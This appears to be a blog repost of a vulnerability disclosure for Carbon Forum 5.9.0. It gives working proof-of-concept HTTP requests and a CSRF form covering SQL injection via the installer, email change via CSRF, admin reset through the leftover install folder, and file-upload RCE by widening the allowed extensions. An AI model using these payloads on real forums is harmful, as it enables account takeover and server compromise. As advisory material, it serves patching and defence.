{"id":57663,"date":"2024-06-24T17:30:06","date_gmt":"2024-06-24T14:30:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179193\/carbonforum590-sqlxsrf.txt"},"modified":"2024-06-24T17:30:06","modified_gmt":"2024-06-24T14:30:06","slug":"carbon-forum-5-9-0-cross-site-request-forgery-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/carbon-forum-5-9-0-cross-site-request-forgery-sql-injection\/","title":{"rendered":"Carbon Forum 5.9.0 Cross Site Request Forgery \/ SQL Injection"},"content":{"rendered":"<p>{-} Title =&gt; Carbon Forum 5.9.0 &#8211; Multiple Exploits<br \/>{-} Author =&gt; bRpsd [cy@Live.no]{-} Date Release =&gt; 22 June, 2024<br \/>{-} Vendor =&gt; Carbon Forum &lt;= 5.9.0<br \/>Homepage =&gt; https:\/\/www.94cb.com\/<br \/>Download =&gt; https:\/\/github.com\/lincanbin\/Carbon-Forum<br \/>Vulnerable Versions =&gt; 5.9.0 &gt;=<br \/>Tested Version =&gt; 5.9.0 on xampp Server.<\/p>\n<p>#######################################################################################<br \/>Vulnerability #1 : Reset Administrator Password &amp; Database settings<br \/>File Path: http:\/\/localhost\/Carbon-Forum\/install\/<br \/>INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user<br \/>#######################################################################################<\/p>\n<p>#######################################################################################<br \/>Vulnerability #2 : SQL Injection<br \/>Vulnerable Code: \/Carbon-Forum\/install\/index.php<br \/>if ($_SERVER[&#8216;REQUEST_METHOD&#8217;] == &#8216;POST&#8217;) {<br \/>$fp = fopen(__DIR__ . &#8216;\/database.sql&#8217;, &#8220;r&#8221;) or die(&#8220;SQL\u6587\u4ef6\u65e0\u6cd5\u6253\u5f00\u3002 The SQL File could not be opened.&#8221;);<br \/>\/\/dobefore<br \/>if (isset($_POST[&#8220;Language&#8221;]) &amp;&amp; isset($_POST[&#8220;DBHost&#8221;]) &amp;&amp; isset($_POST[&#8220;DBName&#8221;]) &amp;&amp; isset($_POST[&#8220;DBUser&#8221;]) &amp;&amp; isset($_POST[&#8220;DBPassword&#8221;])) {<br \/>$Language = $_POST[&#8216;Language&#8217;];<br \/>$DBHost = $_POST[&#8216;DBHost&#8217;];<br \/>$DBName = $_POST[&#8216;DBName&#8217;];<br \/>$DBUser = $_POST[&#8216;DBUser&#8217;];<br \/>$DBPassword = $_POST[&#8216;DBPassword&#8217;];<br \/>$SearchServer = $_POST[&#8216;SearchServer&#8217;];<br \/>$SearchPort = $_POST[&#8216;SearchPort&#8217;];<br \/>$EnableMemcache = $_POST[&#8216;EnableMemcache&#8217;];<br \/>$MemCachePrefix = $_POST[&#8216;MemCachePrefix&#8217;];<br \/>} else {<br \/>die(&#8220;An Unexpected Error Occured!&#8221;);<br \/>}<br \/>\/\/$WebsitePath = $_POST[&#8216;WebsitePath&#8217;];<br \/>$WebsitePath = $_SERVER[&#8216;PHP_SELF&#8217;] ? $_SERVER[&#8216;PHP_SELF&#8217;] : $_SERVER[&#8216;SCRIPT_NAME&#8217;];<br \/>if (preg_match(&#8216;\/(.*)\\\/install\/i&#8217;, $WebsitePath, $WebsitePathMatch)) {<br \/>$WebsitePath = $WebsitePathMatch[1];<br \/>} else {<br \/>$WebsitePath = &#8221;;<br \/>}<br \/>\/\/\u521d\u59cb\u5316\u6570\u636e\u5e93\u64cd\u4f5c\u7c7b<br \/>require(&#8216;..\/library\/PDO.class.php&#8217;);<br \/>$DB = new Db($DBHost, 3306, &#8221;, $DBUser, $DBPassword);<br \/>$DatabaseExist = $DB-&gt;single(&#8220;SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName&#8221;, array(&#8216;DBName&#8217; =&gt; $DBName));<br \/>if (empty($DatabaseExist)) {<br \/>$DB-&gt;query(&#8220;CREATE DATABASE IF NOT EXISTS &#8221; . $DBName . &#8220;;&#8221;);<br \/>}<\/p>\n<p>POC Request:<br \/>POST http:\/\/localhost\/Carbon-Forum\/install\/?<br \/>Host: localhost<br \/>User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko\/20100101 Firefox\/127.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate, br, zstd<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 173<br \/>Origin: http:\/\/localhost<br \/>Connection: keep-alive<br \/>Referer: http:\/\/localhost\/Carbon-Forum\/install\/<br \/>Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3<br \/>Upgrade-Insecure-Requests: 1<br \/>Sec-Fetch-Dest: document<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-User: ?1<br \/>Language=en&amp;DBHost=localhost&amp;DBName=&amp;DBUser=test&#8217;&amp;DBPassword=&amp;SearchServer=&amp;SearchPort=&amp;EnableMemcache=false&amp;MemCachePrefix=carbon_&amp;submit=\u5b89 \u88c5 \/ Install<\/p>\n<p>Response:<br \/>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#8221; at line 1<br \/>You can find the error back in the log.<br \/>#######################################################################################<\/p>\n<p>################################################################################################################<br \/>Vulnerability #3 : CSRF &#8211; Change users email <br \/>File Path: http:\/\/localhost\/Carbon-Forum\/settings<br \/>Method: POST<br \/>Parameter : UserMail<br \/>Code:Carbon-Forum\/controller\/settings.php<\/p>\n<p>POC:<br \/>case &#8216;UpdateUserInfo&#8217;:<br \/>$CurUserInfo[&#8216;UserSex&#8217;] = intval(Request(&#8216;POST&#8217;, &#8216;UserSex&#8217;, 0));<br \/>$CurUserInfo[&#8216;UserMail&#8217;] = IsEmail(Request(&#8216;POST&#8217;, &#8216;UserMail&#8217;, $CurUserInfo[&#8216;UserMail&#8217;])) ? Request(&#8216;POST&#8217;, &#8216;UserMail&#8217;, $CurUserInfo[&#8216;UserMail&#8217;]) : $CurUserInfo[&#8216;UserMail&#8217;];<br \/>$CurUserInfo[&#8216;UserHomepage&#8217;] = CharCV(Request(&#8216;POST&#8217;, &#8216;UserHomepage&#8217;, $CurUserInfo[&#8216;UserHomepage&#8217;]));<br \/>$CurUserInfo[&#8216;UserIntro&#8217;] = CharCV(Request(&#8216;POST&#8217;, &#8216;UserIntro&#8217;, $CurUserInfo[&#8216;UserIntro&#8217;]));<br \/>$UpdateUserInfoResult = UpdateUserInfo(array(<br \/>&#8216;UserSex&#8217; =&gt; $CurUserInfo[&#8216;UserSex&#8217;],<br \/>&#8216;UserMail&#8217; =&gt; $CurUserInfo[&#8216;UserMail&#8217;],<br \/>&#8216;UserHomepage&#8217; =&gt; $CurUserInfo[&#8216;UserHomepage&#8217;],<br \/>&#8216;UserIntro&#8217; =&gt; $CurUserInfo[&#8216;UserIntro&#8217;]));<br \/>if ($UpdateUserInfoResult) {<br \/>$UpdateUserInfoMessage = $Lang[&#8216;Profile_Modified_Successfully&#8217;];<\/p>\n<p>&lt;form method=&#8217;POST&#8217; action=&#8217;http:\/\/localhost\/Carbon-Forum\/settings&#8217;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;Action&#8221; value=&#8221;UpdateUserInfo&#8221;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;UserSex&#8221; value=&#8221;0&#8243;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;UserMail&#8221; value=&#8221;changed@new-email.com&#8221;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;UserHomepage&#8221; value=&#8221;&#8221;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;UserIntro&#8221; value=&#8221;&#8221;&gt;<br \/>&lt;input type=&#8217;submit&#8217; value=&#8217;submit&#8217;&gt;<br \/>&lt;\/form&gt;<br \/>################################################################################################################<\/p>\n<p>#######################################################################################<br \/>Vulnerability #4 : Arbitrary File Upload &#8211; RCE [Authenticated]Info: Administrator can change allowed files in dashboard -&gt; parameter<br \/>POC POST:<br \/>http:\/\/localhost\/Carbon-Forum\/dashboard#dashboard4<br \/>Host: localhost<br \/>User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko\/20100101 Firefox\/127.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate, br, zstd<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 14662<br \/>Origin: http:\/\/localhost<br \/>Connection: keep-alive<br \/>Referer: http:\/\/localhost\/Carbon-Forum\/dashboard<br \/>Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop<br \/>Upgrade-Insecure-Requests: 1<br \/>Sec-Fetch-Dest: document<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-User: ?1<br \/>Action=Parameter&amp;UploadParameters=\/* \u524d\u540e\u7aef\u901a\u4fe1\u76f8\u5173\u7684\u914d\u7f6e,\u6ce8\u91ca\u53ea\u5141\u8bb8\u4f7f\u7528\u591a\u884c\u65b9\u5f0f *\/ { \/* \u4e0a\u4f20\u56fe\u7247\u914d\u7f6e\u9879 *\/ &#8220;imageActionName&#8221;: &#8220;uploadimage&#8221;, \/* \u6267\u884c\u4e0a\u4f20\u56fe\u7247\u7684action\u540d\u79f0 *\/ &#8220;imageFieldName&#8221;: &#8220;upfile&#8221;, \/* \u63d0\u4ea4\u7684\u56fe\u7247\u8868\u5355\u540d\u79f0 *\/ &#8220;imageMaxSize&#8221;: 4096000, \/* \u4e0a\u4f20\u5927\u5c0f\u9650\u5236\uff0c\u5355\u4f4dB *\/ &#8220;imageAllowFiles&#8221;: [&#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;], \/* \u4e0a\u4f20\u56fe\u7247\u683c\u5f0f\u663e\u793a *\/ &#8220;imageCompressEnable&#8221;: true, \/* \u662f\u5426\u538b\u7f29\u56fe\u7247,\u9ed8\u8ba4\u662ftrue *\/ &#8220;imageCompressBorder&#8221;: 1600, \/* \u56fe\u7247\u538b\u7f29\u6700\u957f\u8fb9\u9650\u5236 *\/ &#8220;imageInsertAlign&#8221;: &#8220;none&#8221;, \/* \u63d2\u5165\u7684\u56fe\u7247\u6d6e\u52a8\u65b9\u5f0f *\/ &#8220;imageUrlPrefix&#8221;: &#8220;&#8221;, \/* \u56fe\u7247\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;imagePathFormat&#8221;: &#8220;\/upload\/image\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ \/* {filename} \u4f1a\u66ff\u6362\u6210\u539f\u6587\u4ef6\u540d,\u914d\u7f6e\u8fd9\u9879\u9700\u8981\u6ce8\u610f\u4e2d\u6587\u4e71\u7801\u95ee\u9898 *\/ \/* {rand:6} \u4f1a\u66ff\u6362\u6210\u968f\u673a\u6570,\u540e\u9762\u7684\u6570\u5b57\u662f\u968f\u673a\u6570\u7684\u4f4d\u6570 *\/ \/* {time} \u4f1a\u66ff\u6362\u6210\u65f6\u95f4\u6233 *\/ \/* {yyyy} \u4f1a\u66ff\u6362\u6210\u56db\u4f4d\u5e74\u4efd *\/ \/* {yy} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u5e74\u4efd *\/ \/* {mm} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u6708\u4efd *\/ \/* {dd} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u65e5\u671f *\/ \/* {hh} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u5c0f\u65f6 *\/ \/* {ii} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u5206\u949f *\/ \/* {ss} \u4f1a\u66ff\u6362\u6210\u4e24\u4f4d\u79d2 *\/ \/* \u975e\u6cd5\u5b57\u7b26 \\ : * ? &#8221; &lt; &gt; | *\/ \/* \u5177\u8bf7\u4f53\u770b\u7ebf\u4e0a\u6587\u6863: fex.baidu.com\/ueditor\/#use-format_upload_filename *\/ \/* \u6d82\u9e26\u56fe\u7247\u4e0a\u4f20\u914d\u7f6e\u9879 *\/ &#8220;scrawlActionName&#8221;: &#8220;uploadscrawl&#8221;, \/* \u6267\u884c\u4e0a\u4f20\u6d82\u9e26\u7684action\u540d\u79f0 *\/ &#8220;scrawlFieldName&#8221;: &#8220;upfile&#8221;, \/* \u63d0\u4ea4\u7684\u56fe\u7247\u8868\u5355\u540d\u79f0 *\/ &#8220;scrawlPathFormat&#8221;: &#8220;\/upload\/image\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ &#8220;scrawlMaxSize&#8221;: 2048000, \/* \u4e0a\u4f20\u5927\u5c0f\u9650\u5236\uff0c\u5355\u4f4dB *\/ &#8220;scrawlUrlPrefix&#8221;: &#8220;&#8221;, \/* \u56fe\u7247\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;scrawlInsertAlign&#8221;: &#8220;none&#8221;, &#8220;scrawlAllowFiles&#8221;: [&#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;], \/* \u622a\u56fe\u5de5\u5177\u4e0a\u4f20 *\/ &#8220;snapscreenActionName&#8221;: &#8220;uploadimage&#8221;, \/* \u6267\u884c\u4e0a\u4f20\u622a\u56fe\u7684action\u540d\u79f0 *\/ &#8220;snapscreenPathFormat&#8221;: &#8220;\/upload\/image\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ &#8220;snapscreenUrlPrefix&#8221;: &#8220;&#8221;, \/* \u56fe\u7247\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;snapscreenInsertAlign&#8221;: &#8220;none&#8221;, \/* \u63d2\u5165\u7684\u56fe\u7247\u6d6e\u52a8\u65b9\u5f0f *\/ \/* \u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u914d\u7f6e *\/ &#8220;catcherLocalDomain&#8221;: [&#8220;127.0.0.1&#8221;, &#8220;localhost&#8221;, &#8220;img.baidu.com&#8221;], &#8220;catcherActionName&#8221;: &#8220;catchimage&#8221;, \/* \u6267\u884c\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u7684action\u540d\u79f0 *\/ &#8220;catcherFieldName&#8221;: &#8220;source&#8221;, \/* \u63d0\u4ea4\u7684\u56fe\u7247\u5217\u8868\u8868\u5355\u540d\u79f0 *\/ &#8220;catcherPathFormat&#8221;: &#8220;\/upload\/image\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ &#8220;catcherUrlPrefix&#8221;: &#8220;&#8221;, \/* \u56fe\u7247\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;catcherMaxSize&#8221;: 2048000, \/* \u4e0a\u4f20\u5927\u5c0f\u9650\u5236\uff0c\u5355\u4f4dB *\/ &#8220;catcherAllowFiles&#8221;: [&#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;], \/* \u6293\u53d6\u56fe\u7247\u683c\u5f0f\u663e\u793a *\/ \/* \u4e0a\u4f20\u89c6\u9891\u914d\u7f6e *\/ &#8220;videoActionName&#8221;: &#8220;uploadvideo&#8221;, \/* \u6267\u884c\u4e0a\u4f20\u89c6\u9891\u7684action\u540d\u79f0 *\/ &#8220;videoFieldName&#8221;: &#8220;upfile&#8221;, \/* \u63d0\u4ea4\u7684\u89c6\u9891\u8868\u5355\u540d\u79f0 *\/ &#8220;videoPathFormat&#8221;: &#8220;\/upload\/video\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ &#8220;videoUrlPrefix&#8221;: &#8220;&#8221;, \/* \u89c6\u9891\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;videoMaxSize&#8221;: 20480000, \/* \u4e0a\u4f20\u5927\u5c0f\u9650\u5236\uff0c\u5355\u4f4dB\uff0c\u9ed8\u8ba420MB *\/ &#8220;videoAllowFiles&#8221;: [ &#8220;.flv&#8221;, &#8220;.swf&#8221;, &#8220;.mkv&#8221;, &#8220;.avi&#8221;, &#8220;.rm&#8221;, &#8220;.rmvb&#8221;, &#8220;.mpeg&#8221;, &#8220;.mpg&#8221;, &#8220;.ogg&#8221;, &#8220;.ogv&#8221;, &#8220;.mov&#8221;, &#8220;.wmv&#8221;, &#8220;.mp4&#8221;, &#8220;.webm&#8221;, &#8220;.mp3&#8221;, &#8220;.wav&#8221;, &#8220;.mid&#8221;], \/* \u4e0a\u4f20\u89c6\u9891\u683c\u5f0f\u663e\u793a *\/ \/* \u4e0a\u4f20\u6587\u4ef6\u914d\u7f6e *\/ &#8220;fileActionName&#8221;: &#8220;uploadfile&#8221;, \/* controller\u91cc,\u6267\u884c\u4e0a\u4f20\u89c6\u9891\u7684action\u540d\u79f0 *\/ &#8220;fileFieldName&#8221;: &#8220;upfile&#8221;, \/* \u63d0\u4ea4\u7684\u6587\u4ef6\u8868\u5355\u540d\u79f0 *\/ &#8220;filePathFormat&#8221;: &#8220;\/upload\/file\/{yyyy}{mm}{dd}\/{time}{rand:6}&#8221;, \/* \u4e0a\u4f20\u4fdd\u5b58\u8def\u5f84,\u53ef\u4ee5\u81ea\u5b9a\u4e49\u4fdd\u5b58\u8def\u5f84\u548c\u6587\u4ef6\u540d\u683c\u5f0f *\/ &#8220;fileUrlPrefix&#8221;: &#8220;&#8221;, \/* \u6587\u4ef6\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;fileMaxSize&#8221;: 2048000, \/* \u4e0a\u4f20\u5927\u5c0f\u9650\u5236\uff0c\u5355\u4f4dB\uff0c\u9ed8\u8ba42MB *\/ &#8220;fileAllowFiles&#8221;: [ &#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;, &#8220;.flv&#8221;, &#8220;.swf&#8221;, &#8220;.mkv&#8221;, &#8220;.avi&#8221;, &#8220;.rm&#8221;, &#8220;.rmvb&#8221;, &#8220;.mpeg&#8221;, &#8220;.mpg&#8221;, &#8220;.ogg&#8221;, &#8220;.ogv&#8221;, &#8220;.mov&#8221;, &#8220;.wmv&#8221;, &#8220;.mp4&#8221;, &#8220;.webm&#8221;, &#8220;.mp3&#8221;, &#8220;.wav&#8221;, &#8220;.mid&#8221;, &#8220;.rar&#8221;, &#8220;.zip&#8221;, &#8220;.tar&#8221;, &#8220;.gz&#8221;, &#8220;.7z&#8221;, &#8220;.bz2&#8221;, &#8220;.cab&#8221;, &#8220;.iso&#8221;, &#8220;.doc&#8221;, &#8220;.docx&#8221;, &#8220;.xls&#8221;, &#8220;.xlsx&#8221;, &#8220;.ppt&#8221;, &#8220;.pptx&#8221;, &#8220;.pdf&#8221;, &#8220;.txt&#8221;, &#8220;.md&#8221;, &#8220;.xml&#8221; ], \/* \u4e0a\u4f20\u6587\u4ef6\u683c\u5f0f\u663e\u793a *\/ \/* \u5217\u51fa\u6307\u5b9a\u76ee\u5f55\u4e0b\u7684\u56fe\u7247 *\/ &#8220;imageManagerActionName&#8221;: &#8220;listimage&#8221;, \/* \u6267\u884c\u56fe\u7247\u7ba1\u7406\u7684action\u540d\u79f0 *\/ &#8220;imageManagerListPath&#8221;: &#8220;\/upload\/image\/&#8221;, \/* \u6307\u5b9a\u8981\u5217\u51fa\u56fe\u7247\u7684\u76ee\u5f55 *\/ &#8220;imageManagerListSize&#8221;: 60, \/* \u6bcf\u6b21\u5217\u51fa\u6587\u4ef6\u6570\u91cf *\/ &#8220;imageManagerUrlPrefix&#8221;: &#8220;&#8221;, \/* \u56fe\u7247\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;imageManagerInsertAlign&#8221;: &#8220;none&#8221;, \/* \u63d2\u5165\u7684\u56fe\u7247\u6d6e\u52a8\u65b9\u5f0f *\/ &#8220;imageManagerAllowFiles&#8221;: [&#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;], \/* \u5217\u51fa\u7684\u6587\u4ef6\u7c7b\u578b *\/ \/* \u5217\u51fa\u6307\u5b9a\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6 *\/ &#8220;fileManagerActionName&#8221;: &#8220;listfile&#8221;, \/* \u6267\u884c\u6587\u4ef6\u7ba1\u7406\u7684action\u540d\u79f0 *\/ &#8220;fileManagerListPath&#8221;: &#8220;\/upload\/file\/&#8221;, \/* \u6307\u5b9a\u8981\u5217\u51fa\u6587\u4ef6\u7684\u76ee\u5f55 *\/ &#8220;fileManagerUrlPrefix&#8221;: &#8220;&#8221;, \/* \u6587\u4ef6\u8bbf\u95ee\u8def\u5f84\u524d\u7f00 *\/ &#8220;fileManagerListSize&#8221;: 60, \/* \u6bcf\u6b21\u5217\u51fa\u6587\u4ef6\u6570\u91cf *\/ &#8220;fileManagerAllowFiles&#8221;: [ &#8220;.png&#8221;, &#8220;.jpg&#8221;, &#8220;.jpeg&#8221;, &#8220;.gif&#8221;, &#8220;.bmp&#8221;, &#8220;.flv&#8221;, &#8220;.swf&#8221;, &#8220;.mkv&#8221;, &#8220;.avi&#8221;, &#8220;.rm&#8221;, &#8220;.rmvb&#8221;, &#8220;.mpeg&#8221;, &#8220;.mpg&#8221;, &#8220;.ogg&#8221;, &#8220;.ogv&#8221;, &#8220;.mov&#8221;, &#8220;.wmv&#8221;, &#8220;.mp4&#8221;, &#8220;.webm&#8221;, &#8220;.mp3&#8221;, &#8220;.wav&#8221;, &#8220;.mid&#8221;, &#8220;.rar&#8221;, &#8220;.zip&#8221;, &#8220;.tar&#8221;, &#8220;.gz&#8221;, &#8220;.7z&#8221;, &#8220;.bz2&#8221;, &#8220;.cab&#8221;, &#8220;.iso&#8221;, &#8220;.doc&#8221;, &#8220;.docx&#8221;, &#8220;.xls&#8221;, &#8220;.xlsx&#8221;, &#8220;.ppt&#8221;, &#8220;.pptx&#8221;, &#8220;.pdf&#8221;, &#8220;.txt&#8221;, &#8220;.md&#8221;, &#8220;.xml&#8221; ] \/* \u5217\u51fa\u7684\u6587\u4ef6\u7c7b\u578b *\/ }&amp;TextFilterParameter=\/* \u5173\u952e\u8bcd\u8fc7\u6ee4\u76f8\u5173\u7684\u914d\u7f6e,\u6ce8\u91ca\u53ea\u5141\u8bb8\u4f7f\u7528\u591a\u884c\u65b9\u5f0f *\/ { \/* \u5173\u952e\u8bcd\u5747\u652f\u6301\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u8fc7\u591a\u7684\u8fc7\u6ee4\u4f1a\u5f71\u54cd\u6027\u80fd &#8220;fuck&#8221; : &#8220;f**k&#8221;, \u4ee5\u4e0a\u89c4\u5219\u8868\u793a\u53d1\u8868\u542bfuck\u7684\u5185\u5bb9\uff0c\u4f1a\u88ab\u8fc7\u6ee4\u4e3af**k &#8220;negro&#8221; : [false, 30], Don&#8217;t issue text with &#8220;negro&#8221;, or it will freeze for 30 seconds. &#8220;\u86e4&#8221; : [false, 30], \u4ee5\u4e0a\u89c4\u5219\u7981\u6b62\u53d1\u5e03\u542b\u201c\u86e4\u201d\u7684\u5185\u5bb9\uff0c\u5e76\u4e14\u5c1d\u8bd5\u53d1\u8868\u8be5\u5185\u5bb9\u7684\u7528\u6237\u4f1a\u88ab\u7eed(jin)\u6389(yan)30\u79d2\u751f\u547d &#8220;negro&#8221; : [&#8220;black&#8221;, 30], &#8220;\u5305\u5b50&#8221; : [&#8220;\u7ef4\u5c3c&#8221;, 30], \u4ee5\u4e0a\u89c4\u5219\u8868\u793a\u53d1\u8868\u542b&#8221;\u5305\u5b50&#8221;\u7684\u5185\u5bb9\uff0c\u4f1a\u88ab\u8fc7\u6ee4\u4e3a&#8221;\u7ef4\u5c3c&#8221;\uff0c\u5e76\u4e14\u5728\u5185\u5bb9\u53d1\u8868\u6210\u529f\u540e\uff0c\u9700\u8981\u518d\u7b4930\u79d2\u624d\u80fd\u53d1\u8a00 *\/ \/* &#8220;fuck&#8221; : &#8220;f**k&#8221;, &#8220;negro&#8221; : [false, 30], &#8220;\u86e4&#8221; : [false, 30], &#8220;negro&#8221; : [&#8220;black&#8221;, 30], &#8220;\u5305\u5b50&#8221; : [&#8220;\u7ef4\u5c3c&#8221;, 30] *\/ }&amp;submit=Save settings<\/p>\n<p>#######################################################################################<\/p>\n<p>#######################################################################################<br \/>Vulnerability #4 : Vulnerable PHPMailer library<br \/>File: \/Carbon-Forum\/library\/PHPMailer.class.php<br \/>Version: $Version = &#8216;5.2.16&#8217;;<br \/>#######################################################################################<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{-} Title =&gt; Carbon Forum 5.9.0 &#8211; Multiple Exploits{-} Author =&gt; bRpsd [cy@Live.no]{-} Date Release =&gt; 22 June, 2024{-} Vendor =&gt; Carbon Forum &lt;= 5.9.0Homepage =&gt; https:\/\/www.94cb.com\/Download =&gt; https:\/\/github.com\/lincanbin\/Carbon-ForumVulnerable Versions =&gt; 5.9.0 &gt;=Tested Version =&gt; 5.9.0 on xampp Server. #######################################################################################Vulnerability #1 : Reset Administrator Password &amp; Database settingsFile Path: http:\/\/localhost\/Carbon-Forum\/install\/INFO: The install folder remains after &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57663","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57663"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57663\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}